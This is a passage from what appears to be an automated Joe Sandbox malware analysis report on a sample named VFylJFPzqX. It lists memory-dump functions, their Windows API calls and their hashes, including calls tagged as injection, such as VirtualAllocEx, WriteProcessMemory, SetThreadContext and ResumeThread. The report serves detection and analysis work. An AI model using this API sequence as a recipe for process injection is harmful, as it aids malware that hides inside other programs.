                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A21E0A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                                                                                                        • Opcode ID: 916599740f8221dca65dc8c146baa2f2d2e94e99b3021a57bbc46e341b25ddf2
                                                                                                                                                                                                                                        • Instruction ID: f21f30f2dfdd9bdc09860de1ca6739b4ca558bae66b340341c6632d43f3fdc07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 916599740f8221dca65dc8c146baa2f2d2e94e99b3021a57bbc46e341b25ddf2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB41B0B1D00319EFDB14CF9AD885ADEBBB5BF88310F64812AE819AB210D7759945CF90
                                                                                                                                                                                                                                        Function 0A213381 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A213453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                        • Opcode ID: 5e0cd07e98237a4bea0ec39a96b86c9294d08a8e3c9e1427208e88c95b441a49
                                                                                                                                                                                                                                        • Instruction ID: 769829f9e87d63bb7b766f450d1153202f9298e53c20461c7b567e509bfceb77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd07e98237a4bea0ec39a96b86c9294d08a8e3c9e1427208e88c95b441a49
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE316975D00349DFDB10DFAAD880BEEBBF5EB49310F10806AE858A7251D3799A44CFA1
                                                                                                                                                                                                                                        Function 05A2154C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 536 5a2154c-5a242fc 539 5a24302-5a24307 536->539 540 5a243ac-5a243cc call 5a21424 536->540 541 5a2435a-5a24392 CallWindowProcW 539->541 542 5a24309-5a24340 539->542 548 5a243cf-5a243dc 540->548 544 5a24394-5a2439a 541->544 545 5a2439b-5a243aa 541->545 549 5a24342-5a24348 542->549 550 5a24349-5a24358 542->550 544->545 545->548 549->550 550->548
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A24381
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallProcWindow
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2714655100-0
                                                                                                                                                                                                                                        • Opcode ID: 7afe7274ad81fd36e3671da2b12f25094ebf00d161fc9cd0f9877f4f04af65d1
                                                                                                                                                                                                                                        • Instruction ID: e57c3c2df4f4fca6dacfce14970b82976ae80e24f9e8aa58a32c7dd841777165
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7afe7274ad81fd36e3671da2b12f25094ebf00d161fc9cd0f9877f4f04af65d1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A4136B4A003198FCB14CF99C489FAAFBF5FB88314F248459E419A7321D774A845CFA0
                                                                                                                                                                                                                                        Function 0A21C858 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A21C8E8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                                                                                        • Opcode ID: 9df6de8b56dc6c89220445c9d05eb9a79ff87f3acaa22022820d1615bf5f355b
                                                                                                                                                                                                                                        • Instruction ID: 9da2da1b734e402e64ad5f4a4a4b9f1a5d351fa14fb0839b23def1e392fd1a04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9df6de8b56dc6c89220445c9d05eb9a79ff87f3acaa22022820d1615bf5f355b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2321257591034A9FDB14DFAAC881BDEBBF5FF88310F10842AE959A7240C7789944DFA4
                                                                                                                                                                                                                                        Function 0562D398 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0562D427
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                        • Opcode ID: c82c9fb60b0afc59d986db2a55d4aefd417c064604df117ced2d5e1454de698d
                                                                                                                                                                                                                                        • Instruction ID: dd7138e3b2623d2601166532aa0737fa4e69dbed415423506edb4536d18f0d1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c82c9fb60b0afc59d986db2a55d4aefd417c064604df117ced2d5e1454de698d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3621E5B5900209AFDB10CFAAD884ADEFBF9FB48710F14841AE954A7750C374A955CFA0
                                                                                                                                                                                                                                        Function 0A21CE08 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A21CE86
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                        • Opcode ID: 498c37b765b0b86ab5af1c7b0da59816cd64bc6cc7b85064ab2c040f72cccb14
                                                                                                                                                                                                                                        • Instruction ID: ecf1177379ab5444f56d1cd3c7a5505ed63977fc35919fc1953f50ad13944a4e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 498c37b765b0b86ab5af1c7b0da59816cd64bc6cc7b85064ab2c040f72cccb14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0213875D103098FDB14DFAAC485BAEBBF4AF88610F148429D459A7240CB78A945CFA4
                                                                                                                                                                                                                                        Function 0A21BF20 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0A21BF9E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                        • Opcode ID: c34efc88e04d74dcde87071820775af8210d42f757e6000c46eab779e3fe7169
                                                                                                                                                                                                                                        • Instruction ID: 0746a924e79b504a960e064f9ad08eb07be5941fabc4ac540e47ead0edb12683
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c34efc88e04d74dcde87071820775af8210d42f757e6000c46eab779e3fe7169
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 862127719103098FDB14DFAAC4857EEBBF4EF88324F54842EE559A7240CB78A945CFA4
                                                                                                                                                                                                                                        Function 0562D3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0562D427
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                                                                                        • Opcode ID: 520df21835f709960694c45d3b740b85f6be53fde49d6db402135c6f2905a121
                                                                                                                                                                                                                                        • Instruction ID: 52ce628a426127ff4988a1aab48bdce7dba463e73e66d1d37b291665fcf30d92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 520df21835f709960694c45d3b740b85f6be53fde49d6db402135c6f2905a121
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD21E4B59002099FDB10CFAAD884ADEBBF8FB48310F14841AE958A7350C374A944CFA0
                                                                                                                                                                                                                                        Function 05E775A9 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 05E77620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                                                                                        • Opcode ID: 14b8b6915c7189d5f4efab3298d843b30b889606d268c3577cd927e4ce24285e
                                                                                                                                                                                                                                        • Instruction ID: f3c6d8098e9e7dafb665d0e4f1ddcde0032b451e6f143986d98bf2fb5f765495
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14b8b6915c7189d5f4efab3298d843b30b889606d268c3577cd927e4ce24285e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB2133B5C0065A9FDB14CF9AD441BAEFBB4FF48620F11812AE859A3240D738A944CFA5
                                                                                                                                                                                                                                        Function 05E7379C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 05E77620
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                                                                                        • Opcode ID: c755b9a401c332b2c6b6952375299d1a9f126dc419a7ccbe2d9c26d89f21bf5c
                                                                                                                                                                                                                                        • Instruction ID: 31cceece6c584efb64d312909c9c0b3e9a3cb6e160ac0fd30060c95ed1509ea0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c755b9a401c332b2c6b6952375299d1a9f126dc419a7ccbe2d9c26d89f21bf5c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F2147B1C0061A9FDB14DF9AD445BAEFBF4FF48620F118129E858A7240D738A904CFE5
                                                                                                                                                                                                                                        Function 0A2133E0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0A213453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                        • Opcode ID: 148a41f0ca04e446f9b2897691c2de8d579096d2f970386e5e57e7c69ea046be
                                                                                                                                                                                                                                        • Instruction ID: 7a3ede564bbab76552a663f6b4c04d96d7f50027974b7a3d0213b5246faafeed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 148a41f0ca04e446f9b2897691c2de8d579096d2f970386e5e57e7c69ea046be
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721E4B59002499FDB10DF9AC884BDEFBF5FB48320F108429E958A7250D778A644CFA5
                                                                                                                                                                                                                                        Function 073CB560 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 073CB5D3
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                        • Opcode ID: e0d93748624a018cf0968481d9314470779d7978e226d21d64018e2a30f1fc8b
                                                                                                                                                                                                                                        • Instruction ID: 5040f62a609dfea1ef2912f076a42822c7fed684e93f0a41ecd9a1fbf54bcc8d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d93748624a018cf0968481d9314470779d7978e226d21d64018e2a30f1fc8b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3421E4B59002499FDB10DF9AD885BDEFBF4FB48320F108429E958A7250D778AA44CFA5
                                                                                                                                                                                                                                        Function 0A21C588 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A21C5F6
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                        • Opcode ID: 5a0d890ddc805d38045d8717093e84a210b59fbcaa3366beb490dca655e7bcc5
                                                                                                                                                                                                                                        • Instruction ID: 63423c728233154aa3b3ce6672beaf7b215fc12920f0537fcfe46d9d5be7f172
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a0d890ddc805d38045d8717093e84a210b59fbcaa3366beb490dca655e7bcc5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 991164758003499FDB14DFAAC844BDFBBF5EF88320F148829E559A7250CB79A900CFA0
                                                                                                                                                                                                                                        Function 0A21D048 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                        • Opcode ID: 42ceaa141710d6bd8b9488c683f113b814df83b11c23bab03e0498d89151f2d4
                                                                                                                                                                                                                                        • Instruction ID: 8c27e23979985262939d4cd75d38e76b65f8819dac346cf2aa8246c26cdb287c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42ceaa141710d6bd8b9488c683f113b814df83b11c23bab03e0498d89151f2d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F116A718003498FDB24DFAAC44479EFBF4AF88320F148829D559A7240CB796504CF94
                                                                                                                                                                                                                                        Function 0A219D48 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A21DAC5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                                                                                                        • Opcode ID: 65e62eccbc03621052df1c27a103e25613cf52de59a025b0c6f1e64a75ba9ea3
                                                                                                                                                                                                                                        • Instruction ID: 1934783123e036ff6b218a99c05f57935ed75fd5e39924d608b08f6475956a0f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65e62eccbc03621052df1c27a103e25613cf52de59a025b0c6f1e64a75ba9ea3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C41125B5800349DFCB10DF9AC484BDEBBF8FB58320F108829E558A3600C379A944CFA1
                                                                                                                                                                                                                                        Function 0562B0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0562B126
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1486957684.0000000005620000.00000040.00000800.00020000.00000000.sdmp, Offset: 05620000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_5620000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                                                                                                        • Opcode ID: e7ff297f4f97083c087727521659eb529a8b9e61c73897f4efbcdff665608766
                                                                                                                                                                                                                                        • Instruction ID: 4587fecd7f4712177dd7bb74694a9b9cf4de55de99c37209b9c00c580c5f00a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7ff297f4f97083c087727521659eb529a8b9e61c73897f4efbcdff665608766
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C110FB5C007598FCB10DF9AD844ADEFBF4EB89220F10842AD859A7610C379A545CFA1
                                                                                                                                                                                                                                        Function 00C366A0 Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: 78a053f86218ed117a1692ef03eff6dc80dbe60b4a4e2418c848b5a45c49f8c7
                                                                                                                                                                                                                                        • Instruction ID: 74b57845aa99d455785dd6e9ff3d43d5ff0d8039f7ae067a6ef96973556af519
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78a053f86218ed117a1692ef03eff6dc80dbe60b4a4e2418c848b5a45c49f8c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E815E34A10505EFCB14DF69C884AAAB7B2FF89314F65C069D415DB3A1D731ED41CBA2
                                                                                                                                                                                                                                        Function 00C3EFF9 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: O
                                                                                                                                                                                                                                        • API String ID: 0-878818188
                                                                                                                                                                                                                                        • Opcode ID: 44c7523462e7e6456f5d958450725b2a0fa734a99f300a8ec49ec464689b14dd
                                                                                                                                                                                                                                        • Instruction ID: 684521ef41ac7b3940dc49b01c9084a88eec812ca036d445cc4ef62138d48d31
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44c7523462e7e6456f5d958450725b2a0fa734a99f300a8ec49ec464689b14dd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2271F271D14605CFC715CB2CD5806AABBB1FF41324F1589AAD8699B362D331ED07CBA1
                                                                                                                                                                                                                                        Function 00C35078 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: 087ce6a58901c57ed7aa5ee69c612409354499d1e92ddb24e6734237f4cdbf7c
                                                                                                                                                                                                                                        • Instruction ID: 0aa8a4418c3c098f867e99b86ba2b7edb4bcaa7905707722f8e09205dc7c4f5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 087ce6a58901c57ed7aa5ee69c612409354499d1e92ddb24e6734237f4cdbf7c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5317E35740609DFCB059F64D858AAEBBA2FB88314F00C029F91987350CB35DE65EB95
                                                                                                                                                                                                                                        Function 00C398D8 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: 58ee3c10f03376bbbbe7ce11c3b25c89c3b4d357e29f512810a064c756957215
                                                                                                                                                                                                                                        • Instruction ID: 289e3004051b1f0ae1d65f6c913fed17e64842823777d72061051fd4f461aacd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58ee3c10f03376bbbbe7ce11c3b25c89c3b4d357e29f512810a064c756957215
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E12133313243004BDB252B3688A537D779BEFD8719F14803ED85ACB3A1DAB5CC42A781
                                                                                                                                                                                                                                        Function 00C398E8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1470345803.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_c30000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xp
                                                                                                                                                                                                                                        • API String ID: 0-1324357017
                                                                                                                                                                                                                                        • Opcode ID: 8c42346169bb02bc7a9457beb9140a20ea124f139011625c71df0cfaacf97fd3
                                                                                                                                                                                                                                        • Instruction ID: 8f7a988655c20dd16d9c66f01f0d19ee4dfe18856c24c810e7a8758c9edc9d5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c42346169bb02bc7a9457beb9140a20ea124f139011625c71df0cfaacf97fd3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21F6313243118BEB14672688A477E769BEFC5719F14803ED85ACB3A4DEB5CD81E381
                                                                                                                                                                                                                                        Function 00C36508 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
